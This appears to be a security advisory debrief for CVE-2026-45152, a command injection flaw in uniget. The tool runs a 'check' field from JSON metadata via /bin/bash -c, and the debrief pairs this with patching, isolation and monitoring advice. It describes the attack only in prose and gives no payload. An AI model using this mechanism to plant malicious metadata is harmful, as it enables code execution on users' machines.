CVE-2026-45152 uniget-org CVE debrief

Who should care

Organizations and developers using uniget for container tool management, particularly those consuming metadata from external or untrusted sources. Security teams monitoring supply chain risks in container tooling ecosystems.

Technical summary

The uniget tool executes a `check` field from JSON metadata using `/bin/bash -c` without input validation or sanitization. An attacker can supply malicious metadata containing shell metacharacters or command substitution sequences. When a user performs operations such as describe, install, update, or inspect, the uniget tool retrieves and executes the attacker-controlled `check` field, resulting in arbitrary command execution with the user's privileges. The vulnerability is classified as CWE-78 (OS Command Injection).

Defensive priority

HIGH

Recommended defensive actions

• Upgrade uniget to version 0.27.1 or later to remediate this vulnerability.
• Review and audit any custom or third-party metadata files used with uniget for malicious content if operating unpatched versions.
• Restrict uniget execution to isolated environments with minimal privileges until patching is complete.
• Monitor for suspicious shell execution patterns originating from uniget processes in endpoint detection systems.

Evidence notes

The vulnerability description indicates the `check` field from JSON metadata is executed via `/bin/bash -c` without validation. Common operations like describe, install, update, and inspect trigger this execution path. The CVSS 3.1 vector (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) indicates local attack vector with user interaction required, but high impact on confidentiality, integrity, and availability.

Official resources